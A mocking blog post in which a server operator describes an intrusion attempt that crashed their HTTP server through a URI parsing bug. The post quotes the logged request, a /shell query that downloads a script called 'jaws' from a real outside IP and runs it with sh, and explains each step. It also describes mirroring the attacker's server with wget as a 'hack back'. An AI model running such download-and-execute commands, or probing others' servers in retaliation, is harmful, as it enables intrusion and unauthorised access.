Search This Blog

2018-07-25

GRATZ!!!... finally... :)

lol: "first to the key"... thank you, you also earned this post and a report to the cops (for the sake of my children, sorry... at least you get to learn... hopefully to hack better, and for better goals :) ::: someone send something stupid enough to stop our server in its tracks... ("stupid enough": the backend is definitely not sh)... neither URIs used for code evaluation... but the server broke anyways because of parsing... hoops, forgot to catch that exception... aka: dare not to presume that you were smart at all... we do use bash netcat http server for local use... that, by the way, would not come down with this kind of URI... but definitely ::: very nice for future testings, these hacking requests that you send...

2216 ::ffff:156.197.132.62 8080 undefined /shell?cd+/tmp;cd+/var;wget+http://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo

Stopping all running ...

Exiting: URIError: URI malformed
    at decodeURIComponent ()
    at splitAndDecode (eval at (54:1), :123:24)
    at KeepItSimple.handler (eval at (54:1), :147:24)

... so is just the parsing that is not ignoring enough... now ::: please retry only in next version, it will take long... and spare us of manual server restarts... nah... better we go with a temporary fix:

  while : ; do http-server ; done ;

... yes ::: give us your IPs...

... now.... let's read this want-to-be-hacker simple line:

  `undefined' : as if we have that virtual host
  `/shell' : as if we match this path or at all evaluate shell commands sent in this uri query part as such
    `cd+/tmp;cd+/var;wget+http://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo'

... so the children can understand...

go to /tmp (and do nothing?... lol...) ; go to /var ; connect to the hacker and download his script `jaws' as `wodo' (lol: trying to scare someone?) ; run it with sh ; and then remove it... lol... where do you hire these noobs!... i don't want to know...

... so... we... lol... rofl... muah... ahahahahhahahah...
we hacked back... and stolen all their hacking scripts...
using the commands :

# we actually using /tmp for these events... lol...
cd /tmp
# using the anonymous tor network
# export http_proxy=socks5://localhost:9050
# hoops : wget does not support socks5, curl does... but not now
# download all their files
wget --recursive \
     --no-clobber \
     --page-requisites \
     --html-extension \
     --convert-links \
     --no-parent \
     199.195.254.118

 how nice of them to leave them publicly available... and tell us about it... poor incompetents from (or sucking) boston... :( ... they are now still wondering why their hack is not recalling... yet our site is down... :( ... so confusing for them... so  i come here and explain to the little children and hackers...

bonus ::: the screenshots of the hackers site... that also use Debian... (nice start)... now ::: go help you neighbors to migrate from windows... please... ip's in the scripts... ???... cd /tmp for nothing?... `jaws'?... `wodo'?... have you rather met jesus... master of the word... duh!... he codes better... you should know him better ::: thou swords are only useless and shameful.

you made the wall ::: have fun...